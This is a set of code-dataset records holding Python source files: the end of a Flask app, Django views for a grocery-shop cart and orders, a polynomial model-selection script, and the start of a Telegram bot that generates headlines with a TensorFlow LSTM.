jsonify(all_data)\n\n\n\nif __name__ == '__main__':\n load_model()\n app.run(debug=True)\n", "sub_path": "backup/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 18786, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", 
"line_number": 21, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 68, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 79, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 144, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 152, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 172, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 188, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 196, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 205, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 215, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 217, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 219, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 239, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 263, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 297, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 312, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 332, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 349, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 386, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 393, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 483, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 486, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 490, "usage_type": "call"}]}
+{"seq_id": "411000732", "text": "from django.http import JsonResponse\r\nfrom django.shortcuts import render,HttpResponseRedirect\r\nfrom app.models import MainWheel,MainNav,MainMustBuy,MainShop,MainShow,FoodType,Goods,CartModel,OrderModel,OrderGoodsModel\r\nfrom user.models import UserModel, UserTicketModel\r\nfrom django.core.urlresolvers import reverse\r\n\r\nfrom utils.functions import get_order_random_id\r\n\r\n\r\ndef home(request):\r\n '''\r\n 首页视图函数\r\n '''\r\n if request.method == 'GET':\r\n mainwheels = MainWheel.objects.all()\r\n navs = MainNav.objects.all()\r\n mustbuys = MainMustBuy.objects.all()\r\n mainshops = MainShop.objects.all()\r\n mainshows = MainShow.objects.all()\r\n data = {\r\n 'title':'首页',\r\n 'mainwheel':mainwheels,\r\n 'mustbuys':mustbuys,\r\n 'navs':navs,\r\n 'mainshops':mainshops,\r\n 'mainshows':mainshows\r\n }\r\n return render(request,'home/home.html',data)\r\n\r\ndef mine(request):\r\n '''\r\n 个人中心\r\n '''\r\n if request.method == 'GET':\r\n user = request.user\r\n orders = OrderModel.objects.filter(user=user)\r\n payed , wait_pay = 0,0\r\n for order in orders:\r\n if order.o_status == 0:\r\n wait_pay += 1\r\n if order.o_status == 1:\r\n payed +=1\r\n\r\n data = {\r\n 'wait_pay':wait_pay,\r\n 'payed':payed\r\n }\r\n return render(request,'mine/mine.html',data)\r\n\r\ndef market(request):\r\n '''\r\n 闪购超市\r\n '''\r\n if request.method == 'GET':\r\n return HttpResponseRedirect(reverse('axf:params_market',args=('104749','0','0')))\r\n\r\ndef user_market(request,typeid,cid,sid):\r\n '''\r\n :param typeid: 分类id\r\n :param cid: 子分类id\r\n :param sid: 排序id\r\n '''\r\n if request.method == 'GET':\r\n ticket = request.COOKIES.get('ticket')\r\n user_ticket = UserTicketModel.objects.filter(ticket=ticket).first()\r\n if user_ticket:\r\n user = user_ticket.user\r\n else:\r\n user = ''\r\n # user = request.user\r\n foodtypes = FoodType.objects.all()\r\n if cid == '0':\r\n goods = Goods.objects.filter(categoryid=typeid)\r\n else:\r\n goods = Goods.objects.filter(categoryid=typeid,\r\n childcid=cid)\r\n foodtypes_current = foodtypes.filter(typeid=typeid).first()\r\n if foodtypes_current:\r\n childtypes = foodtypes_current.childtypenames\r\n childtypenames = childtypes.split('#')\r\n child_list = []\r\n for childtypename in childtypenames:\r\n child_type_info = childtypename.split(':')\r\n child_list.append(child_type_info)\r\n #排序\r\n if sid == '0':\r\n pass\r\n if sid == '1':\r\n goods = goods.order_by('productnum')\r\n if sid == '2':\r\n goods = goods.order_by('-price')\r\n if sid == '3':\r\n goods = goods.order_by('price')\r\n\r\n #返回购物车信息\r\n if user:\r\n user_cart = CartModel.objects.filter(user=user)\r\n else:\r\n user_cart = ''\r\n\r\n data = {\r\n 'foodtypes':foodtypes,\r\n 'goods':goods,\r\n 'typeid':typeid,\r\n 'child_list':child_list,\r\n 'cid':cid,\r\n 'user_cart':user_cart\r\n }\r\n return render(request,'market/market.html',data)\r\n\r\n\r\ndef add_cart(request):\r\n '''\r\n 添加购物车\r\n '''\r\n if request.method == 'POST':\r\n user = request.user\r\n goods_id = request.POST.get('goods_id')\r\n #判断用户是否是系统自带的anonymouseuser还是登陆的用户\r\n data = {\r\n 'code': 200,\r\n 'msg': '请求成功'\r\n }\r\n if user.id:\r\n user_carts = CartModel.objects.filter(user=user,goods_id=goods_id).first()\r\n if user_carts:\r\n user_carts.c_num += 1\r\n user_carts.save()\r\n data['c_num'] = user_carts.c_num\r\n else:\r\n CartModel.objects.create(user=user,goods_id=goods_id)\r\n data['c_num'] = 1\r\n carts = CartModel.objects.filter(user=user,is_select=True)\r\n price = 0\r\n for cart in 
carts:\r\n                price = cart.goods.price * cart.c_num + price\r\n            data['price'] = int(price)\r\n            return JsonResponse(data)\r\n        data['msg'] = 'Current user is not logged in'\r\n        return JsonResponse(data)\r\n\r\ndef sub_cart(request):\r\n    '''\r\n    Decrease the quantity of an item in the user's cart.\r\n    '''\r\n    if request.method == 'POST':\r\n        goods_id = request.POST.get('goods_id')\r\n        user = request.user\r\n        data = {\r\n            'msg':'Request successful',\r\n            'code':200\r\n        }\r\n        if user.id:\r\n            # fetch the cart entry for this goods item\r\n            user_carts = CartModel.objects.filter(user=user,goods_id=goods_id).first()\r\n            # if the item is already in the cart\r\n            if user_carts:\r\n                if user_carts.c_num == 1:\r\n                    user_carts.delete()\r\n                    data['c_num'] = 0\r\n                else:\r\n                    user_carts.c_num -= 1\r\n                    data['c_num'] = user_carts.c_num\r\n                    user_carts.save()\r\n                price = 0\r\n                carts = CartModel.objects.filter(user=user, is_select=True)\r\n                for cart in carts:\r\n                    price = cart.goods.price * cart.c_num + price\r\n                data['price'] = int(price)\r\n                return JsonResponse(data)\r\n            data['c_num'] = 0\r\n            return JsonResponse(data)\r\n        data['msg'] = 'The user is not logged in'\r\n        data['code'] = '403'\r\n        return JsonResponse(data)\r\n\r\ndef cart(request):\r\n    if request.method == 'GET':\r\n        user = request.user\r\n        # query the user's cart items\r\n        user_carts = CartModel.objects.filter(user=user)\r\n        price = 0\r\n        for carts in user_carts:\r\n            if carts.is_select == True:\r\n                price = carts.goods.price * carts.c_num + price\r\n        data = {\r\n            'user_carts':user_carts,\r\n            'price':int(price)\r\n        }\r\n        return render(request,'cart/cart.html',data)\r\n\r\ndef change_select_status(request):\r\n    if request.method == 'POST':\r\n        user = request.user\r\n        cart_id = request.POST.get('cart_id')\r\n        cart = CartModel.objects.filter(id=cart_id).first()\r\n        if cart.is_select:\r\n            cart.is_select = False\r\n        else:\r\n            cart.is_select = True\r\n        cart.save()\r\n        g_carts = CartModel.objects.filter(user=user,is_select=True)\r\n        price = 0\r\n        for g_cart in g_carts:\r\n            price = g_cart.goods.price * g_cart.c_num + price\r\n        data = {\r\n            'code':200,\r\n            'msg':'Request successful',\r\n            'is_select':cart.is_select,\r\n            'price':int(price)\r\n        }\r\n        return JsonResponse(data)\r\n\r\ndef allcheck(request):\r\n    if request.method == 'GET':\r\n        user = request.user\r\n        user_cart = CartModel.objects.filter(user=user)\r\n        for cart in user_cart:\r\n            cart.is_select = True\r\n            cart.save()\r\n        data = {\r\n            'code':200,\r\n            'msg':'Request successful',\r\n        }\r\n        return JsonResponse(data)\r\n\r\n\r\ndef generate_order(request):\r\n    if request.method == 'GET':\r\n        # place an order\r\n        user = request.user\r\n        # create the order\r\n        o_num = get_order_random_id()\r\n        order = OrderModel.objects.create(user=user,\r\n                                          o_num=o_num)\r\n        # order only the selected cart items\r\n        user_carts = CartModel.objects.filter(user=user,is_select=True)\r\n        for carts in user_carts:\r\n            # link each goods item to the order\r\n            OrderGoodsModel.objects.create(goods=carts.goods,order=order,goods_num=carts.c_num)\r\n        user_carts.delete()\r\n        return render(request,'order/order_info.html',{'order':order})\r\n\r\ndef pay(request):\r\n    if request.method == 'POST':\r\n        order_id = request.POST.get('order_id')\r\n        OrderModel.objects.filter(id=order_id).update(o_status=1)\r\n        return JsonResponse({'code':'200'})\r\n    # user = request.user\r\n    # order = OrderModel.objects.filter(user=user).first()\r\n    # order.o_status = 1\r\n    # order.save()\r\n    # return render(request,'mine/mine.html')\r\n\r\n\r\ndef order_wait_pay(request):\r\n    if request.method == 'GET':\r\n        user = request.user\r\n        orders = OrderModel.objects.filter(user=user,o_status=0)\r\n        return render(request,'order/order_list_wait_pay.html',{'orders':orders})\r\n\r\ndef order_payed(request):\r\n    if request.method == 
'GET':\r\n user = request.user\r\n orders = OrderModel.objects.filter(user=user,o_status=1)\r\n return render(request,'order/order_list_payed.html',{'orders':orders})\r\n\r\ndef waitpay_topay(request):\r\n if request.method == 'GET':\r\n order_id = request.GET.get('order_id')\r\n order = OrderModel.objects.filter(id=order_id).first()\r\n return render(request,'order/order_info.html',{'order':order})", "sub_path": "axf/app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 9266, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "app.models.MainWheel.objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": "app.models.MainWheel.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "app.models.MainWheel", "line_number": 15, "usage_type": "name"}, {"api_name": "app.models.MainNav.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "app.models.MainNav.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.models.MainNav", "line_number": 16, "usage_type": "name"}, {"api_name": "app.models.MainMustBuy.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "app.models.MainMustBuy.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "app.models.MainMustBuy", "line_number": 17, "usage_type": "name"}, {"api_name": "app.models.MainShop.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "app.models.MainShop.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.models.MainShop", "line_number": 18, "usage_type": "name"}, {"api_name": "app.models.MainShow.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "app.models.MainShow.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.models.MainShow", "line_number": 19, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "user.models", "line_number": 35, "usage_type": "name"}, {"api_name": "app.models.OrderModel.objects.filter", "line_number": 36, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "app.models.OrderModel", "line_number": 36, "usage_type": "name"}, {"api_name": "user.models", "line_number": 36, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 55, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 55, "usage_type": "call"}, {"api_name": "user.models.UserTicketModel.objects.filter", "line_number": 65, "usage_type": "call"}, {"api_name": "user.models.UserTicketModel.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "user.models.UserTicketModel", "line_number": 65, "usage_type": "name"}, {"api_name": "user.models", "line_number": 67, "usage_type": "name"}, {"api_name": "user.models", "line_number": 69, "usage_type": "name"}, {"api_name": "app.models.FoodType.objects.all", "line_number": 71, "usage_type": "call"}, {"api_name": "app.models.FoodType.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "app.models.FoodType", "line_number": 71, "usage_type": "name"}, {"api_name": "app.models.Goods.objects.filter", "line_number": 73, "usage_type": "call"}, {"api_name": "app.models.Goods.objects", "line_number": 73, "usage_type": "attribute"}, 
{"api_name": "app.models.Goods", "line_number": 73, "usage_type": "name"}, {"api_name": "app.models.Goods.objects.filter", "line_number": 75, "usage_type": "call"}, {"api_name": "app.models.Goods.objects", "line_number": 75, "usage_type": "attribute"}, {"api_name": "app.models.Goods", "line_number": 75, "usage_type": "name"}, {"api_name": "user.models", "line_number": 96, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 97, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 97, "usage_type": "name"}, {"api_name": "user.models", "line_number": 97, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 109, "usage_type": "call"}, {"api_name": "user.models", "line_number": 117, "usage_type": "name"}, {"api_name": "user.models.id", "line_number": 124, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 124, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 125, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 125, "usage_type": "name"}, {"api_name": "user.models", "line_number": 125, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.create", "line_number": 131, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 131, "usage_type": "name"}, {"api_name": "user.models", "line_number": 131, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 133, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 133, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 133, "usage_type": "name"}, {"api_name": "user.models", "line_number": 133, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 138, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 140, "usage_type": "call"}, {"api_name": "user.models", "line_number": 148, "usage_type": "name"}, {"api_name": "user.models.id", "line_number": 153, "usage_type": "attribute"}, {"api_name": "user.models", "line_number": 153, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 155, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 155, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 155, "usage_type": "name"}, {"api_name": "user.models", "line_number": 155, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 166, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 166, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 166, "usage_type": "name"}, {"api_name": "user.models", "line_number": 166, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 170, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 172, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 175, "usage_type": "call"}, {"api_name": "user.models", "line_number": 179, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 181, "usage_type": "call"}, {"api_name": 
"app.models.CartModel.objects", "line_number": 181, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 181, "usage_type": "name"}, {"api_name": "user.models", "line_number": 181, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 190, "usage_type": "call"}, {"api_name": "user.models", "line_number": 194, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 196, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 196, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 196, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 202, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 202, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 202, "usage_type": "name"}, {"api_name": "user.models", "line_number": 202, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 212, "usage_type": "call"}, {"api_name": "user.models", "line_number": 216, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 217, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 217, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 217, "usage_type": "name"}, {"api_name": "user.models", "line_number": 217, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 225, "usage_type": "call"}, {"api_name": "user.models", "line_number": 231, "usage_type": "name"}, {"api_name": "utils.functions.get_order_random_id", "line_number": 233, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects.create", "line_number": 234, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects", "line_number": 234, "usage_type": "attribute"}, {"api_name": "app.models.OrderModel", "line_number": 234, "usage_type": "name"}, {"api_name": "user.models", "line_number": 234, "usage_type": "name"}, {"api_name": "app.models.CartModel.objects.filter", "line_number": 237, "usage_type": "call"}, {"api_name": "app.models.CartModel.objects", "line_number": 237, "usage_type": "attribute"}, {"api_name": "app.models.CartModel", "line_number": 237, "usage_type": "name"}, {"api_name": "user.models", "line_number": 237, "usage_type": "name"}, {"api_name": "app.models.OrderGoodsModel.objects.create", "line_number": 240, "usage_type": "call"}, {"api_name": "app.models.OrderGoodsModel.objects", "line_number": 240, "usage_type": "attribute"}, {"api_name": "app.models.OrderGoodsModel", "line_number": 240, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 242, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects.filter", "line_number": 247, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects", "line_number": 247, "usage_type": "attribute"}, {"api_name": "app.models.OrderModel", "line_number": 247, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 248, "usage_type": "call"}, {"api_name": "user.models", "line_number": 258, "usage_type": "name"}, {"api_name": "app.models.OrderModel.objects.filter", "line_number": 259, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects", "line_number": 259, "usage_type": "attribute"}, {"api_name": "app.models.OrderModel", "line_number": 259, "usage_type": "name"}, {"api_name": "user.models", "line_number": 259, "usage_type": "name"}, 
{"api_name": "django.shortcuts.render", "line_number": 260, "usage_type": "call"}, {"api_name": "user.models", "line_number": 264, "usage_type": "name"}, {"api_name": "app.models.OrderModel.objects.filter", "line_number": 265, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects", "line_number": 265, "usage_type": "attribute"}, {"api_name": "app.models.OrderModel", "line_number": 265, "usage_type": "name"}, {"api_name": "user.models", "line_number": 265, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 266, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects.filter", "line_number": 271, "usage_type": "call"}, {"api_name": "app.models.OrderModel.objects", "line_number": 271, "usage_type": "attribute"}, {"api_name": "app.models.OrderModel", "line_number": 271, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 272, "usage_type": "call"}]}
+{"seq_id": "405554739", "text": "from samplesinus import SampleSinus\nfrom vizualisation import Vizualisation\nfrom closedform import ClosedForm\nfrom matplotlib import pyplot as plt\n\nclass ModelSelection(object):\n \"\"\" \n Fit different order polynomials to the training data.\n Evaluate model performance using a test data set.\n\n \"\"\"\n\n FIG_W = 6 # Figure width\n FIG_H = 4 # Figure height\n\n BOX = [0.1, 0.1, 0.8, 0.8] # Box axes 1\n YLIM = [0, 1]\n\n CLR_TRAIN = '#003049'\n CLR_TEST = '#D62828'\n\n FRMT_TRAIN = '{0}//tranining_xte.dat'\n FRMT_TEST = '{0}//test_xte.dat'\n\n def __init__(self, Ntraining, Ntest, Mmax):\n \"\"\" Create test and training data set. Fit differt polynomials.\n\n :param Ntraining - int, number of data points in training dataset.\n :param Ntest - int, number of data points in test dataset.\n :param Mmax - int, maximum number for polynomial order.\n \"\"\"\n \n # Create Training Data, Test Data and Function Definition\n FOLDER = 'model_N{0}'.format(Ntraining)\n self.train = self.FRMT_TRAIN.format(FOLDER)\n self.test = self.FRMT_TEST.format(FOLDER) \n\n sin = SampleSinus()\n sin.target(Ntraining, self.train)\n sin.target(Ntest, self.test, xdistr='random')\n SIN_FUNC = '{0}//sinus.func'.format(FOLDER)\n sin.function( SIN_FUNC )\n\n self.Ms = []\n self.RMSEs_train = []\n self.RMSEs_test = []\n\n self.Mmax= Mmax\n for m in range(self.Mmax+1):\n\n model = '{0}//poly_M{1}.func'.format(FOLDER, m)\n fig_name = '{0}//poly_M{1}.png'.format(FOLDER, m)\n weights_name = '{0}/weights_M{1}.dat'.format(FOLDER, m)\n\n cs = ClosedForm(m)\n cs.solve(self.train, weights_name)\n cs.test(self.test)\n cs.function(model)\n\n viz = Vizualisation()\n viz.target(self.train)\n viz.function( SIN_FUNC )\n viz.function(model, clr_option='model')\n viz.to_file( fig_name )\n\n self.Ms.append(m)\n self.RMSEs_train.append( cs.RMSE_train )\n self.RMSEs_test.append( cs.RMSE_test )\n\n file_out = '{0}//model_selection.png'.format( FOLDER )\n self._display_errors(file_out)\n\n def _display_errors(self, file_out):\n \"\"\" Display training and test errors. \"\"\"\n\n self.FIG = plt.figure(figsize=(self.FIG_W, self.FIG_H))\n self.AX1 = self.FIG.add_axes(self.BOX)\n self.AX1.set_xlim([-1, self.Mmax+1])\n self.AX1.set_ylim(self.YLIM)\n\n self.AX1.plot(self.Ms, self.RMSEs_train, \n marker='o',\n linestyle='-',\n linewidth=2,\n color=self.CLR_TRAIN)\n self.AX1.plot(self.Ms, self.RMSEs_test, \n marker='o',\n linestyle='-',\n linewidth=2,\n color=self.CLR_TEST)\n\n self.FIG.savefig(file_out)\n", "sub_path": "cha1/regression/modelselection.py", "file_name": "modelselection.py", "file_ext": "py", "file_size_in_byte": 2983, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "samplesinus.SampleSinus", "line_number": 38, "usage_type": "call"}, {"api_name": "closedform.ClosedForm", "line_number": 55, "usage_type": "call"}, {"api_name": "vizualisation.Vizualisation", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}]}
+{"seq_id": "440915268", "text": "import tensorflow as tf\r\n\r\nimport numpy as np\r\nimport os\r\nimport time\r\n\r\nimport telebot\r\nfrom telebot import types\r\nimport random\r\nimport datetime\r\nimport sqlite3\r\n# import all the modules\r\n\r\n\r\n\r\n\r\ntext = open('tutby_titles.txt', 'rb').read().decode(encoding='utf-8')\r\n# writing all the titles from file to variable 'text'\r\n# doing it line by line cause my server wasn't powerful enough to do it in one time\r\n\r\nvocab = sorted(set(text))\r\n# creating vocabulary\r\nprint(f'unique characters {len(vocab)}')\r\n\r\nchar2idx = {u:i for i, u in enumerate(vocab)}\r\n\r\nidx2char = np.array(vocab)\r\n# these two are converting characters to numbers and vice versa\r\n# cause neural networks work only with numbers\r\n\r\n\r\ntext_as_int = np.array([char2idx[c] for c in text])\r\n# making np.array out of all the text as integers\r\n# doing it in 150 times cause, again, my server wasn't powerful enough\r\n\r\n\r\n# The maximum length sentence you want for a single input in characters\r\nseq_length = 265\r\n\r\n\r\n\r\n# creating dataset from array with all letters as integers\r\nchar_dataset = tf.data.Dataset.from_tensor_slices(text_as_int)\r\n# It was done for neural network to understand it\r\n\r\nsequences = char_dataset.batch(seq_length+1, drop_remainder=True)\r\n\r\n\r\ndef split_input_target(chunk):\r\n input_text = chunk[:-1]\r\n target_text = chunk[1:]\r\n return input_text, target_text\r\n\r\n\r\n\r\n\r\n\r\n# Batch size\r\nBATCH_SIZE = 72\r\n\r\n# Buffer size to shuffle the dataset\r\n# (TF data is designed to work with possibly infinite sequences,\r\n# so it doesn't attempt to shuffle the entire sequence in memory. Instead,\r\n# it maintains a buffer in which it shuffles elements).\r\nBUFFER_SIZE = 10000\r\n\r\n\r\n\r\n\r\n# Length of the vocabulary in chars\r\nvocab_size = len(vocab)\r\n\r\n# The embedding dimension\r\nembedding_dim = 256\r\n\r\n# Number of RNN units\r\nrnn_units = 1024\r\n\r\n# function for builing model\r\ndef build_model(vocab_size, embedding_dim, rnn_units, batch_size):\r\n model = tf.keras.Sequential([\r\n tf.keras.layers.Embedding(vocab_size, embedding_dim,\r\n batch_input_shape=[batch_size, None]),\r\n tf.keras.layers.LSTM(rnn_units,\r\n return_sequences=True,\r\n stateful=True,\r\n recurrent_initializer='glorot_uniform'),\r\n tf.keras.layers.Dense(vocab_size)\r\n ])\r\n return model\r\n\r\n\r\n\r\n# Directory where the checkpoints will be saved\r\ncheckpoint_dir = './training_checkpoints'\r\n\r\n\r\n\r\n#building model\r\nmodel = build_model(vocab_size, embedding_dim, rnn_units, batch_size=1)\r\n\r\n\r\n#loading weights of latest checkpoint\r\nmodel.load_weights(tf.train.latest_checkpoint(checkpoint_dir))\r\n\r\n#building model\r\nmodel.build(tf.TensorShape([1, None]))\r\n\r\nprint(model.summary())\r\n\r\n\r\n# main func to generate text\r\ndef generate_text(model, start_string, temper = 0.45):\r\n # Evaluation step (generating text using the learned model)\r\n\r\n # Number of characters to generate\r\n num_generate = 1000\r\n\r\n # Converting our start string to numbers (vectorizing)\r\n input_eval = [char2idx[s] for s in start_string]\r\n input_eval = tf.expand_dims(input_eval, 0)\r\n\r\n # Empty string to store our results\r\n text_generated = []\r\n\r\n # Low temperature results in more predictable text.\r\n # Higher temperature results in more surprising text.\r\n # Experiment to find the best setting.\r\n temperature = temper\r\n\r\n # Here batch size == 1\r\n model.reset_states()\r\n 
predictions = model(input_eval)\r\n # remove the batch dimension\r\n predictions = tf.squeeze(predictions, 0)\r\n\r\n # using a categorical distribution to predict the character returned by the model\r\n predictions = predictions / temperature\r\n predicted_id = tf.random.categorical(predictions, num_samples=1)[-1,0].numpy()\r\n while idx2char[predicted_id] != '₪':\r\n predictions = model(input_eval)\r\n # remove the batch dimension\r\n predictions = tf.squeeze(predictions, 0)\r\n\r\n # using a categorical distribution to predict the character returned by the model\r\n predictions = predictions / temperature\r\n predicted_id = tf.random.categorical(predictions, num_samples=1)[-1,0].numpy()\r\n\r\n # Pass the predicted character as the next input to the model\r\n # along with the previous hidden state\r\n input_eval = tf.expand_dims([predicted_id], 0)\r\n\r\n text_generated.append(idx2char[predicted_id])\r\n\r\n return (start_string + ''.join(text_generated))\r\n\r\n#global vatiables for telegram bot\r\n#cause telebot (module for telegam bots) works via decorators and functions under them\r\n#In python to transfer values between functions with variables we need to make them global\r\n#Otherwise, values will remain local to function\r\nglobal new_title\r\nnew_title = ''\r\n\r\nglobal last_temp\r\nlast_temp = 0.53\r\n\r\nglobal last_key\r\nlast_key = ''\r\n\r\nglobal last_w_r\r\nlast_w_r = []\r\n\r\nglobal want_to_send_report\r\nwant_to_send_report = False\r\n\r\nglobal want_to_rply\r\nwant_to_rply = False\r\n\r\n#connecting with bot\r\nbot = telebot.TeleBot('token')\r\n\r\n#keyboard for administrator\r\nadmkb = telebot.types.ReplyKeyboardMarkup(True)\r\nadmkb.row('/about', 'новые сообщения', 'пользователи')\r\n\r\n# connecting with user reports database\r\nconn = sqlite3.connect('user_reports.db')\r\n# cursor to do something with database\r\ncursor = conn.cursor()\r\n# if there is no table in db, create it\r\ncursor.execute('CREATE TABLE IF NOT EXISTS reports (chat TEXT, date TEXT, message_id TEXT, wtchd TEXT)')\r\n\r\n#adding to admin list all users that have to check users info\r\nadmins_list = [504898099]\r\n\r\n#on ready send message to admins that everything is good and bot is running\r\nfor admin in admins_list:\r\n bot.send_message(admin, 'Все готово', reply_markup = admkb)\r\n\r\n\r\n#func to make inline keyboard for telegram bot\r\n#its in func cause it will be called every new messoge so text can be different\r\ndef init_keyb():\r\n keyboard = types.InlineKeyboardMarkup()# creating keyboard\r\n key_like = types.InlineKeyboardButton(text=random.choice(['Класс', 'Отлично', 'Вот это хорошее', 'да', 'запомни это', 'ок', 'норм']), callback_data='like') # creating <> button\r\n key_dis = types.InlineKeyboardButton(text=random.choice(['фе', 'фу', 'ненадо нам больше такого', 'нет', 'бред это все', 'боже что удоли это']), callback_data='bad') # and dislike button\r\n# /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\ /\\\r\n# Words that appear in button. 
